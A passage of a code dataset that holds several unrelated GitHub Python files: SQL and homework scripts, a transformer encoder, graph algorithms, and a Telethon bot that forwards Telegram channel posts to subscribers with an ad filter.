fare\nhelpers.cur.execute(\n'''\nUPDATE trips\nSET fare = %s\nWHERE tripID = %s;\n''', (discounted_fare, trip_id)\n)\n\n# show the trip after the discount\nhelpers.cur.execute(\n'''\nSELECT tripID, fare\nFROM trips\nWHERE tripID = %s;\n''', (str(trip_id),))\n\nresult = helpers.cur.fetchone()\n\nprint(\"the tripID is: \" + str(result[0]) + \" and the new fare is: \" + str(result[1]))","repo_name":"SivanMehta/372-Final-Project","sub_path":"python_scripts/complex_query_3.py","file_name":"complex_query_3.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33949699730","text":"\"\"\"\n# Sample code to perform I/O:\n\nname = input() # Reading input from STDIN\nprint('Hi, %s.' 
% name) # Writing output to STDOUT\n\n# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail\n\"\"\"\n\n# Write your code here\nfrom itertools import accumulate\n\nmod = 720720\nn = int(input())\na = list(map(int, input().strip().split()))\nk = int(input())\nif k == 1:\n    print(n)\nelse:\n    dp = [[0] * n for _ in range(k)]\n    dp[0] = list(accumulate(int(i > 0) for i in a))\n    for i in range(1, k):\n        for j in range(i, n):\n            dp[i][j] = dp[i - 1][j - 1] + dp[i][j - 1]\n    print(dp[k - 1][-1] % mod)\n","repo_name":"HBinhCT/Q-project","sub_path":"hackerearth/Algorithms/Number formation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12129232111","text":"name = input('Enter your name: ')\nsurname = input('Enter your surname: ')\nage = float(input('Enter your age: '))\nweight = float(input('Enter your weight: '))\n\nprint('Your details:\\n' +\n      'Name - ' + name + '\\n' +\n      'Surname - ' + surname + '\\n' +\n      'Age - ' + str(age) + '\\n' +\n      'Weight - ' + str(weight))\n\nif age < 30 and (50 < weight < 120):\n    print('Good condition')\nelif (30 <= age <= 40) and (weight < 50 or weight > 120):\n    print('You need to take care of yourself')\nelif age > 40 and (weight < 50 or weight > 120):\n    print('You should see a doctor')\n\n","repo_name":"GKliuev/learning_python","sub_path":"lesson 1/homework/hard1.py","file_name":"hard1.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13435652301","text":"from torch.nn import functional as F\nfrom models.transformer.utils import PositionWiseFeedForward\nimport torch\nfrom torch import nn\nfrom models.transformer.attention import MultiHeadAttention\n\n\nclass EncoderLayer(nn.Module):\n    def __init__(self, d_model=512, d_k=64, d_v=64, h=8, d_ff=2048, dropout=.1, identity_map_reordering=False,\n                 attention_module=None, attention_module_kwargs=None):\n        super(EncoderLayer, self).__init__()\n        self.identity_map_reordering = identity_map_reordering\n        self.mhatt = MultiHeadAttention(d_model, d_k, d_v, h, dropout, identity_map_reordering=identity_map_reordering,\n                                        attention_module=attention_module,\n                                        attention_module_kwargs=attention_module_kwargs)\n        self.pwff = PositionWiseFeedForward(d_model, d_ff, dropout, identity_map_reordering=identity_map_reordering)\n\n    def forward(self, queries, keys, values, attention_mask=None, attention_weights=None):\n        att = self.mhatt(queries, keys, values, attention_mask, attention_weights)\n        ff = self.pwff(att)\n        return ff\n\n\nclass MultiLevelEncoder(nn.Module):\n    def __init__(self, N, padding_idx, d_model=512, d_k=64, d_v=64, h=8, d_ff=2048, dropout=.1,\n                 identity_map_reordering=False, attention_module=None, attention_module_kwargs=None):\n        super(MultiLevelEncoder, self).__init__()\n        self.d_model = d_model\n        self.dropout = dropout\n        self.layers = nn.ModuleList([EncoderLayer(d_model, d_k, d_v, h, d_ff, dropout,\n                                                  identity_map_reordering=identity_map_reordering,\n                                                  attention_module=attention_module,\n                                                  attention_module_kwargs=attention_module_kwargs)\n                                     for _ in range(N)])\n        self.padding_idx = padding_idx\n\n    def forward(self, input, attention_weights=None):\n        # input (b_s, seq_len, d_in)\n        attention_mask = (torch.sum(input, -1) == self.padding_idx).unsqueeze(1).unsqueeze(1) # (b_s, 1, 1, seq_len)\n\n        outs = []\n        out = input\n        for l in self.layers:\n            out = l(out, out, out, 
attention_mask, attention_weights)\n outs.append(out.unsqueeze(1))\n\n outs = torch.cat(outs, 1)\n return outs, attention_mask\n\n\nclass MemoryAugmentedEncoder(MultiLevelEncoder):\n def __init__(self, N, padding_idx, d_in=2048, **kwargs):\n super(MemoryAugmentedEncoder, self).__init__(N, padding_idx, **kwargs)\n self.fc = nn.Linear(d_in, self.d_model)\n self.dropout = nn.Dropout(p=self.dropout)\n self.layer_norm = nn.LayerNorm(self.d_model)\n\n def forward(self, input, attention_weights=None):\n out = F.relu(self.fc(input))\n out = self.dropout(out)\n out = self.layer_norm(out)\n return super(MemoryAugmentedEncoder, self).forward(out, attention_weights=attention_weights)\n","repo_name":"aimagelab/meshed-memory-transformer","sub_path":"models/transformer/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"31"} +{"seq_id":"22204966133","text":"\"\"\"App models.\n\"\"\"\n\nimport logging\n\nimport requests\nfrom django.db import models\n\nfrom ..azure_iot.utils import upload_module_url\n\nlogger = logging.getLogger(__name__)\n\n\nclass InferenceModule(models.Model):\n \"\"\"InferenceModule Model.\"\"\"\n\n name = models.CharField(max_length=200)\n url = models.CharField(max_length=1000, unique=True)\n\n def recommended_fps(self) -> float:\n try:\n response = requests.get(\n \"http://\" + self.url + \"/get_recommended_total_fps\", timeout=3\n )\n result = float(response.json()[\"fps\"])\n except Exception:\n logger.exception(\n \"Get recommended_fps from inference module failed. Fallback to default.\"\n )\n result = 10.0\n return result\n\n def device(self) -> bool:\n try:\n response = requests.get(\"http://\" + self.url + \"/get_device\", timeout=1)\n result = response.json()[\"device\"]\n return result\n except Exception:\n return \"cpu\"\n\n def is_vpu(self) -> bool:\n try:\n response = requests.get(\"http://\" + self.url + \"/get_device\")\n result = response.json()[\"device\"]\n return result == \"vpu\"\n except Exception:\n return False\n\n def upload_status(self) -> bool:\n try:\n response = requests.get(\"http://\" + str(upload_module_url()) + \"/status\")\n result = response.json()\n return result == \"ready\"\n except Exception:\n return False\n\n def __str__(self):\n return self.name\n","repo_name":"Azure-Samples/azure-intelligent-edge-patterns","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/inference_modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"31"} +{"seq_id":"5259305751","text":"# Python Standard Library Imports\nimport functools\nimport heapq\nimport math\nimport typing as T\nfrom collections import deque\nfrom enum import Enum\n\n# Local Imports\nfrom . import debug\nfrom .q import PriorityQueue\n\n\nclass DataStructure(Enum):\n HEAP = 'heap'\n DEQUE = 'deque'\n\n\nclass TriColor(Enum):\n \"\"\"Tricolor algorithm\n\n Source: https://www.cs.cornell.edu/courses/cs2112/2012sp/lectures/lec24/lec24-12sp.html\n\n Abstractly, graph traversal can be expressed in terms of the tricolor algorithm due to Dijkstra and others. 
In this algorithm, graph nodes are assigned one of three colors that can change over time:\n\n    White nodes are undiscovered nodes that have not been seen yet in the current traversal and may even be unreachable.\n    Black nodes are nodes that are reachable and that the algorithm is done with.\n    Gray nodes are nodes that have been discovered but that the algorithm is not done with yet. These nodes are on a frontier between white and black.\n    Initially there are no black nodes and the roots are gray. As the algorithm progresses, white nodes turn into gray nodes and gray nodes turn into black nodes. Eventually there are no gray nodes left and the algorithm is done.\n\n\n    The algorithm maintains a key invariant at all times: there are no edges from white nodes to black nodes. This is clearly true initially, and because it is true at the end, we know that any remaining white nodes cannot be reached from the black nodes.\n\n    The algorithm pseudo-code is as follows:\n\n    Color all nodes white, except for the root nodes, which are colored gray.\n    While some gray node n exists:\n        color some white successors of n gray.\n        if n has no white successors, optionally color n black.\n    This algorithm is abstract enough to describe many different graph traversals. It allows the particular implementation to choose the node n from among the gray nodes; it allows choosing which and how many white successors to color gray, and it allows delaying the coloring of gray nodes black. We say that such an algorithm is nondeterministic because its behavior is not fully defined. However, as long as it does some work on each gray node that it picks, any implementation that can be described in terms of this algorithm will finish. Further, because the black-white invariant is maintained, it must reach all reachable nodes in the graph.\n\n    One value of defining graph search in terms of the tricolor algorithm is that the tricolor algorithm works even when gray nodes are worked on concurrently, as long as the black-white invariant is maintained. 
Thinking about this invariant therefore helps us ensure that whatever graph traversal we choose will work when parallelized, which is increasingly important.\n \"\"\"\n\n WHITE = 'white'\n GRAY = 'gray'\n BLACK = 'black'\n\n\nclass Graph:\n def __init__(self, INFINITY=math.inf, *args, **kwargs):\n \"\"\"Initialized `Graph` object\n\n Parameters:\n `INFINITY` - Used for calculating shortest paths in Dijkstra's algorithm.\n Defaults to `math.inf`, but can be any number higher than the rest of the expected shortest paths.\n Other values could be `int(1e9)` (1 billion, etc)\n \"\"\"\n self.INFINITY = INFINITY\n\n self.vertices_by_label = {}\n self.vertices = set()\n self.edges = set()\n\n Vertex.reset_cache()\n\n ##\n # Accessors\n\n def add_vertex(self, vertex, map_by_label=False):\n self.vertices.add(vertex)\n\n if map_by_label:\n self.vertices_by_label[vertex.label] = vertex\n\n def add_edge(self, edge):\n self.edges.add(edge)\n self.add_vertex(edge.source)\n self.add_vertex(edge.sink)\n\n def neighbors_of(\n self, vertex, color: T.Optional[TriColor] = None\n ) -> T.Collection[T.Tuple['Vertex', int]]:\n \"\"\"Finds the neighbors of `vertex`\n\n If `color` is provided, the neighbor must be of that color.\n\n This method MAY be overwritten if reusing `Vertex.in_edges` or `Vertex.out_edges`.\n This method SHOULD be overwritten if finding neighbors is custom.\n\n Returns a collection of `(Vertex, edge-weight)` pairs\n\n Test Cases:\n - AoC 2022.12.16\n \"\"\"\n\n neighbors = [\n (edge.sink, edge.weight or edge.sink.weight)\n for edge in vertex.out_edges\n if color is None or edge.sink.color == color\n ]\n return neighbors\n\n ##\n # Mutators\n\n def reset_vertices(self):\n for vertex in self.vertices:\n vertex.reset()\n\n ##\n # Sorting Algorithms\n\n def topological_sort(self, strategy=None):\n if strategy is None:\n strategy = DataStructure.HEAP\n # strategy = DataStructure.DEQUE\n\n return self.topological_sort__kahn(strategy=strategy)\n\n def topological_sort__kahn(self, strategy=None):\n \"\"\"Performs topological sort using Kahn's algorithm\n\n https://en.wikipedia.org/wiki/Topological_sorting#Kahn's_algorithm\n\n Pseudocode:\n\n L ← Empty list that will contain the sorted elements\n S ← Set of all nodes with no incoming edge\n\n while S is not empty do\n remove a node n from S\n add n to L\n for each node m with an edge e from n to m do\n remove edge e from the graph\n if m has no other incoming edges then\n insert m into S\n\n if graph has edges then\n return error (graph has at least one cycle)\n else\n return L (a topologically sorted order)\n\n Test Cases:\n - AoC 2018.12.07\n\n \"\"\"\n if strategy is None:\n strategy = DataStructure.HEAP\n\n L = []\n\n root_vertices = [\n vertex\n for vertex in sorted(\n self.vertices,\n key=lambda vertex: vertex.label,\n )\n if vertex.is_root\n ]\n\n if strategy == DataStructure.HEAP:\n S = []\n for vertex in root_vertices:\n heapq.heappush(S, vertex)\n elif strategy == DataStructure.DEQUE:\n S = deque(root_vertices)\n\n edges = set(self.edges)\n\n while len(S) > 0:\n if strategy == DataStructure.HEAP:\n n = heapq.heappop(S)\n elif strategy == DataStructure.DEQUE:\n n = S.popleft()\n\n L.append(n)\n\n for e in sorted(n.out_edges, key=lambda edge: edge.sink):\n m = e.sink\n edges.remove(e)\n m.remove_incoming_edge(e)\n if len(m.in_edges) == 0:\n if strategy == DataStructure.HEAP:\n heapq.heappush(S, m)\n elif strategy == DataStructure.DEQUE:\n S.append(m)\n\n if len(edges) > 0:\n raise Exception('Detected cycle in graph')\n else:\n return L\n\n 
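    # Illustrative sketch (added for exposition; the name `traverse_tricolor` and
    # the `roots` parameter are assumptions, not part of the original API): the
    # generic tricolor traversal from the class docstring, expressed over this
    # Graph's own Vertex colors. bfs() and shortest_path() below can be read as
    # concrete specializations of this scheme.
    def traverse_tricolor(self, roots):
        """Generic tricolor traversal; returns vertices in finishing order."""
        self.reset_vertices()  # color all nodes white
        gray = deque()
        for root in roots:
            root.color = TriColor.GRAY  # root nodes start gray (discovered)
            gray.append(root)
        finished = []
        while gray:  # while some gray node n exists
            n = gray.popleft()
            for w, _ in self.neighbors_of(n, color=TriColor.WHITE):
                w.color = TriColor.GRAY  # color white successors of n gray
                gray.append(w)
            n.color = TriColor.BLACK  # n has no white successors left
            finished.append(n)
        return finished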
##\n # Pathfinding Algorithms\n\n def bfs(self, source, target):\n \"\"\"Calculates the shortest path to traverse a graph from `source` to `target` where all edges are unit weights.\n\n References:\n - https://en.wikipedia.org/wiki/Breadth-first_search\n\n Test Cases:\n - AoC 2022.12.12\n - AoC 2022.12.24\n \"\"\"\n source.color = TriColor.WHITE\n target.color = TriColor.WHITE\n\n Q = deque()\n Q.append(source)\n\n while len(Q) > 0:\n v = Q.popleft()\n if v.color == TriColor.BLACK:\n # a previously finished vertex\n # used when graph vertices (e.g. `self.neighbors_of()` is calculated dynamically)\n continue\n else:\n v.color = TriColor.BLACK # mark finished\n if v == target:\n # re-assign `target` in case `Vertex.__eq__` has been overridden\n target = v\n break\n\n for w, _ in self.neighbors_of(v, color=TriColor.WHITE):\n w.color = TriColor.GRAY # mark discovered\n w.bfs_parent = v\n Q.append(w)\n\n S = [] # holds the shortest path, or empty if None\n u = target\n if u.color == TriColor.BLACK:\n while u is not None:\n S.append(u)\n u = u.bfs_parent\n\n if len(S) > 0:\n path = S[::-1]\n distance = len(path)\n else:\n path = None\n distance = None\n return path, distance\n\n def shortest_path(self, source, target=None):\n (\n path,\n distance,\n distances,\n ) = self.shortest_path__dijkstra__priority_queue(source, target=target)\n return path, distance, distances\n\n def shortest_path__dijkstra__priority_queue(self, source, target=None):\n \"\"\"Calculates the shortest path to traverse a graph from `source` to `target` vertices\n\n NOTE: `source` can also be a `list`, in which case, the function will calculate\n the shortest past from any vertex in `source` and reaching `target`\n\n CAVEAT: Dijkstra's algorithm does not work with negative edge weights\n\n References:\n - https://en.wikipedia.org/wiki/Pathfinding\n - https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Using_a_priority_queue\n - https://docs.python.org/3/library/heapq.html#priority-queue-implementation-notes\n\n Test Cases:\n - AoC 2021.12.15\n - AoC 2022.12.12\n - AoC 2022.12.16\n \"\"\"\n dist = {} # best distances to `v` from `source`\n prev = {} # predecessors of `v`\n Q = PriorityQueue()\n\n dist[source] = 0\n Q.add_with_priority(source, 0)\n\n for v in self.vertices:\n if v != source:\n dist[v] = self.INFINITY # unknown distance from source to `v`\n prev[v] = None # predecessor of `v`\n\n # the main loop\n reached_target = False\n while not Q.is_empty and not reached_target:\n priority, u = Q.extract_min() # remove and return best vertex\n\n # go through all `v` neighbors of `u`\n for v, edge_weight in self.neighbors_of(u):\n alt = dist[u] + edge_weight\n if alt < dist[v]:\n # current known shortest path to `v` is...\n dist[v] = alt # with distance `alt`\n prev[v] = u # through vertex `u`\n\n if not Q.contains(v):\n Q.add_with_priority(v, alt)\n\n if target is not None and u == target:\n # break as soon as `target` is reached\n # no need to calculate shortest path between every pair of vertices\n reached_target = True\n\n if target is not None and reached_target:\n S = [] # holds the shortest path, or empty if None\n u = target\n if u in prev or u == source:\n while u is not None:\n S.append(u)\n u = prev.get(u)\n\n path = S[::-1]\n distance = sum([v.weight for v in S])\n else:\n path = None\n distance = None\n\n return path, distance, dist\n\n def all_shortest_paths(self):\n dist = {}\n for vertex in self.vertices:\n _, _, distances = self.shortest_path(vertex)\n dist[vertex] = distances\n return 
dist\n\n\n@functools.total_ordering\nclass Vertex:\n    _cache = {}\n\n    def __init__(self, label, weight: T.Optional[int] = None):\n        self.label = label\n        self.weight = weight\n\n        self.color = TriColor.WHITE\n\n        self.out_edges = set()\n        self.in_edges = set()\n\n        self.bfs_parent = None\n\n    @classmethod\n    def reset_cache(cls):\n        cls._cache = {}\n\n    @classmethod\n    def get_or_create(cls, label, weight: T.Optional[int] = None):\n        if label in cls._cache:\n            vertex = cls._cache[label]\n            was_created = False\n        else:\n            vertex = cls(label, weight=weight)\n            was_created = True\n            cls._cache[label] = vertex\n\n        return vertex, was_created\n\n    def reset(self):\n        self.color = TriColor.WHITE\n        self.bfs_parent = None\n\n    def __str__(self):\n        return self.label\n\n    def __lt__(self, other):\n        if (\n            self.weight is not None\n            and other.weight is not None\n            and self.weight != other.weight\n        ):\n            result = self.weight < other.weight\n        else:\n            result = self.label < other.label\n        return result\n\n    def __eq__(self, other):\n        return hash(self) == hash(other)\n\n    def __hash__(self):\n        h = id(self)\n        return h\n\n    @property\n    def is_root(self):\n        return len(self.in_edges) == 0\n\n    @property\n    def is_leaf(self):\n        return len(self.out_edges) == 0\n\n    def add_outgoing_edge(self, edge):\n        self.out_edges.add(edge)\n\n    def add_incoming_edge(self, edge):\n        self.in_edges.add(edge)\n\n    def remove_outgoing_edge(self, edge):\n        self.out_edges.remove(edge)\n\n    def remove_incoming_edge(self, edge):\n        self.in_edges.remove(edge)\n\n\nclass Edge:\n    def __init__(self, source, sink, weight: T.Optional[int] = None):\n        self.source = source\n        self.sink = sink\n        self.weight = weight\n\n        source.add_outgoing_edge(self)\n        sink.add_incoming_edge(self)\n\n    def __str__(self):\n        return f'E: {self.source} - {self.sink}'\n","repo_name":"hacktoolkit/code_challenges","sub_path":"adventofcode/utils/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":13680,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"16163551538","text":"from telethon import TelegramClient, events\n\nfrom telethon.tl.functions.channels import JoinChannelRequest, LeaveChannelRequest\nfrom telethon.tl.functions.messages import ImportChatInviteRequest, CheckChatInviteRequest\n\nfrom telethon.errors.rpcerrorlist import InviteHashExpiredError, InviteHashEmptyError, MediaInvalidError, \\\n    MediaEmptyError\n\nfrom telethon.tl.types import MessageMediaDocument, MessageMediaPhoto, MessageEntityTextUrl, \\\n    ChatInviteAlready, ChatInvite, ReplyInlineMarkup, KeyboardButtonRow, KeyboardButtonUrl\n\nfrom uuid import uuid4\nimport os\nimport shutil\nimport re\n\nimport sqlite3\nimport json\n\nimport logging\n\nimport configparser\ncfg = configparser.ConfigParser()\ncfg.read('./config/config.cfg')\n\n# TODO: VERY BIG TODO: Add subscriptions on sly channels like \"admin-approved\" or \"subscription through bot\"\n\n# TODO: Unsubscribe actually unsubscribes client side from empty channels\n\n# TODO: Set adequate logging [~]\n\n# TODO: Little cosmetic when list is empty write different message\n\n# TODO: We can disable event propagation\n\n# TODO: (very hard) make ad filter [~]\n# some groups add links to THEIR channel, work this out [+]\n# add t.me/{etc} to ad flags [+]\n# check entities for text-url for links [+]\n# check buttons for links [+]\n# check text for links [+]\n# add 'www' to flags [+]\n\n# TODO: Some kind of lock per user on sending albums (this will 
solve albums merging problem)\n\n# TODO: Do not send media partly, just send link preview in any case except full media sent\n\n# Mute channels on which we subscribe [+]\n# (we can't control other connected apps, Telegram Desktop (and others) is an app)\n\n# Check if it is possible to track channels based on id of a channel, not on username (possible db overwrite) [+]\n\n# Carefully look into possibility of tracking private channels [+]\n\n# Consider re-upload if possible (limits on file size?), it will help with private channels [+]\n\n# Check for \"restricted\", \"scam\", \"fake\" flags [+]\n\n# Posts are duplicating! Look into it [+]\n\n# Re-upload files through bot [+]\n\n# Fix UserAlreadyParticipantError [+]\n\n# Share subscriptions [+]\n# (you can send output from /list, which is enough)\n\nlogging.basicConfig(filename='newsletter.log', filemode='a',\n format='%(asctime)s %(name)s %(levelname)s %(message)s',\n datefmt='[%d-%m-%Y %H:%M:%S]',\n level=logging.INFO)\n\nlogger = logging.getLogger('chat')\n\napi_id = int(cfg['ACCOUNTS']['api_id'])\napi_hash = cfg['ACCOUNTS']['api_hash']\nbot_token = cfg['ACCOUNTS']['bot_token']\nbot_client = TelegramClient('bot_client', api_id, api_hash)\nbot_bot = TelegramClient('bot_bot', api_id, api_hash).start(bot_token=bot_token)\n\n\ndef db_add_new_channel_or_user(channel_id, channel_username, channel_title, user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_insert = 'INSERT INTO channels(id,username,title,users) VALUES(?,?,?,?)'\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n sql_update = 'UPDATE channels SET users = ? WHERE id = ?'\n\n try:\n db_cursor.execute(sql_insert, (channel_id, channel_username, channel_title, json.dumps([user_id])))\n except sqlite3.IntegrityError:\n db_cursor.execute(sql_select, (channel_id,))\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n if user_id not in data:\n data.append(user_id)\n db_cursor.execute(sql_update, (json.dumps(data), channel_id))\n\n\ndef db_get_channel_users(channel_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n db_cursor.execute(sql_select, (channel_id,))\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n return data\n\n\ndef db_get_user_channels(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql = 'SELECT * FROM channels WHERE users LIKE ?'\n db_cursor.execute(sql, ('%{0}%'.format(user_id),))\n data = db_cursor.fetchall()\n return data\n\n\ndef db_delete_user_from_channel(channel_id, user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n db_cursor.execute(sql_select, (channel_id,))\n\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n data.remove(user_id)\n if data:\n sql_update = 'UPDATE channels SET users = ? WHERE id = ?'\n db_cursor.execute(sql_update, (json.dumps(data), channel_id))\n else:\n sql_delete = 'DELETE FROM channels WHERE id = ?'\n db_cursor.execute(sql_delete, (channel_id,))\n\n return 0\n\n\ndef db_set_new_user(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n try:\n sql_insert = 'INSERT INTO states(user,state) VALUES(?,?)'\n db_cursor.execute(sql_insert, (user_id, 'idle'))\n except sqlite3.IntegrityError:\n sql_update = 'UPDATE states SET state = ? 
WHERE user = ?'\n db_cursor.execute(sql_update, ('idle', user_id))\n\n return 0\n\n\ndef db_update_user_state(user_id, state):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_update = 'UPDATE states SET state = ? WHERE user = ?'\n db_cursor.execute(sql_update, (state, user_id))\n\n return 0\n\n\ndef db_get_user_state(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_select = 'SELECT * FROM states WHERE user = ?'\n db_cursor.execute(sql_select, (user_id,))\n\n data = db_cursor.fetchall()\n\n return data[0][1]\n\n\nad_flags = ['https://', 'http://', '@', 't.me/', 'www.', 'T.me/', 'WWW.']\n\n\ndef ad_check(message, channel_username):\n # Проверяем сообщение на ссылки\n for flag in ad_flags:\n # if message.message.find(flag) != -1:\n for found in re.finditer(flag, message.message):\n if channel_username is not None:\n # Вырезаем именно эту ссылку из сообщения\n\n # Отрезаем левую часть\n cut_left_part = message.message[found.start():]\n\n # Отрезаем правую часть\n next_line_symbol = cut_left_part.find('\\n')\n space_symbol = cut_left_part.find(' ')\n\n # Если не нашли этих символов, то сообщение и есть ссылка\n if next_line_symbol == -1 and space_symbol == -1:\n cut_right_part = cut_left_part\n # Если один из символов нашёлся, а второй нет - режем по первому\n elif next_line_symbol == -1:\n cut_right_part = cut_left_part[:space_symbol]\n elif space_symbol == -1:\n cut_right_part = cut_left_part[:next_line_symbol]\n # Если оба нашлись - режем по тому что ближе к началу ссылки\n elif next_line_symbol < space_symbol:\n cut_right_part = cut_left_part[:next_line_symbol]\n elif space_symbol < next_line_symbol:\n cut_right_part = cut_left_part[:space_symbol]\n # Если ничего не сработало это пометится как реклама\n else:\n cut_right_part = ''\n\n # Если ссылка не на этот же канал (зачем они так делают)\n if cut_right_part.find(channel_username) == -1:\n return True\n else:\n return True\n\n # Проверяем текст-ссылки если есть\n if message.entities:\n for entity in message.entities:\n if type(entity) == MessageEntityTextUrl:\n if channel_username is not None:\n # Если ссылка не на этот же канал (зачем они так делают)\n if entity.url.find(channel_username) == -1:\n return True\n else:\n return True\n\n # Проверяем кнопки если есть\n if message.reply_markup:\n if type(message.reply_markup) == ReplyInlineMarkup:\n for item in message.reply_markup.rows:\n if type(item) == KeyboardButtonRow:\n for button in item.buttons:\n if type(button) == KeyboardButtonUrl:\n if channel_username is not None:\n # Если ссылка не на этот же канал (зачем они так делают)\n if button.url.find(channel_username) == -1:\n return True\n else:\n return True\n\n return False\n\n\n@bot_client.on(events.Album())\nasync def handle_client_channels_albums(event):\n # Переменные для канала и сообщений в альбоме\n channel = event.chat\n messages = event.messages\n\n if channel.username is None:\n post_link = '[{0}](https://t.me/c/{1}/{2})'.format(channel.title, channel.id, messages[0].id)\n else:\n post_link = '[{0}](https://t.me/{1}/{2})'.format(channel.title, channel.username, messages[0].id)\n\n album_messages_content = ''\n\n for message in messages:\n album_messages_content += '{0}\\n'.format(message.stringify())\n\n album_messages_content = album_messages_content[:-1]\n\n logger.info('{0} NEW album\\n'\n '{1}'\n .format(post_link, album_messages_content))\n\n # Отсечка рекламных постов\n logger.info('{0} checking if album is an 
ad...'.format(post_link))\n if any(ad_check(message, channel.username) for message in messages):\n logger.info('{0} album is an ad'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n 'Возможно рекламный пост'\n .format(post_link),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n else:\n logger.info('{0} album is not an ad'.format(post_link))\n # We assume that caption message always comes first\n caption = messages[0].message\n\n # Всякие конфигурационные переменные\n message_size_cap = 10485760 # 10 megabytes in bytes\n temp_dir_name = str(uuid4())\n os.mkdir('./{0}'.format(temp_dir_name))\n media = []\n\n for message in messages:\n # Если это документ или сжатая фотография\n if type(message.media) is MessageMediaPhoto:\n logger.info('{0} found compressed photo'.format(post_link))\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded compressed photo to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n media.append(media_path)\n elif type(message.media) is MessageMediaDocument:\n logger.info('{0} found document'.format(post_link))\n message_size_cap -= message.media.document.size\n if message_size_cap < 0:\n logger.info('{0} too big document, cancel download'.format(post_link))\n break\n else:\n media_path = await message.download_media('./{0}/{1}'.format(temp_dir_name, str(uuid4())))\n logger.info('{0} downloaded document to {1}'.format(post_link, media_path))\n # media.append(os.path.basename(media_path))\n media.append(media_path)\n\n try:\n # Если лимит законился или ничего не скачали не отправляем ничего кроме ссылки на пост\n if message_size_cap < 0 or not media:\n logger.info('{0} nothing was downloaded, because media size exceeds 10 megabytes'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, messages[0].message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если всё удалось загрузить\n else:\n logger.info('{0} successfully downloaded all media'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_file(user, media, caption='{0}\\n'\n '{1}'\n .format(post_link, caption),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n # Если не получилось отослать картинки (на это мы повлиять не можем)\n except (MediaInvalidError, MediaEmptyError):\n logger.info('{0} some or all media was downloaded, but was not sent, '\n 'because some Telegram servers error'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n '{1}'\n .format(post_link, messages[0].message))\n logger.info('{0} sent to {1}'.format(post_link, user))\n try:\n # Удаляем временную папку\n logger.info('{0} removing temporary directory'.format(post_link))\n shutil.rmtree('./{0}'.format(temp_dir_name))\n logger.info('{0} removed temporary directory'.format(post_link))\n except FileNotFoundError:\n pass\n\n\n@bot_client.on(events.NewMessage())\nasync def 
handle_client_channels(event):\n # Put this somewhere properly (no, this would get more views on posts, which may somehow violate telegram rules)\n # await bot_client.send_read_acknowledge(channel, message)\n\n # https://t.me/{channel_username}/{message_id}\n # https://t.me/c/{channel_id}/{message_id}\n\n channel = event.chat\n message = event.message\n\n # Отсекаем альбомы\n if message.grouped_id is None:\n\n if channel.username is None:\n post_link = '[{0}](https://t.me/c/{1}/{2})'.format(channel.title, channel.id, message.id)\n else:\n post_link = '[{0}](https://t.me/{1}/{2})'.format(channel.title, channel.username, message.id)\n\n logger.info('{0} NEW post\\n'\n '{1}'\n .format(post_link, message.stringify()))\n\n # Отсекаем рекламу\n logger.info('{0} checking if post is an ad...'.format(post_link))\n if ad_check(message, channel.username):\n logger.info('{0} post is an ad'.format(post_link))\n users = db_get_channel_users(channel.id)\n logger.info('{0} sending to {1}'.format(post_link, json.dumps(users)))\n for user in users:\n await bot_bot.send_message(user, '{0}\\n'\n 'Возможно рекламный пост'\n .format(post_link),\n link_preview=False)\n logger.info('{0} sent to {1}'.format(post_link, user))\n else:\n logger.info('{0} post is not an ad'.format(post_link))\n # Если есть какие-то файлы\n logger.info('{0} checking if post has media...'.format(post_link))\n if message.media is not None:\n logger.info('{0} post has media '.format(post_link))\n media_path = ''\n temp_dir_name = str(uuid4())\n message_size_cap = 10485760 # 10 megabytes in 